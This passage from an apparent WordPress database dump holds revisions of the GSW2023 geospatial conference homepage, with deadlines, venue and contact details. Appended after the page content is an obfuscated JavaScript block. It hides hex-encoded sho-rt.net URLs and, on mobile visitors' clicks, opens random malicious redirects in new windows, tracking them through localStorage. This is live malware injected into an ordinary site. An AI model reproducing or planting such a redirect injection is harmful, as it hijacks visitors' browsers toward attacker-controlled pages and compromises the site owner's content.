DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color:white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-02 01:52:57','2023-04-02 01:52:57','',3066,'https://gsw2023.com/?p=3995',0,'revision','',0),
(3996,1,'2023-04-02 01:53:20','2023-04-02 01:53:20','<p>[vc_row][vc_column][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400393668{margin-top: 125px !important;}\"]</p>\n<h6><img class=\"aligncenter wp-image-3987 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400301732{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><img class=\"aligncenter wp-image-3989 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400344244{margin-top: 95px !important;}\"]&nbsp;</p>\n<p><img class=\"aligncenter wp-image-3988 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color:white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner 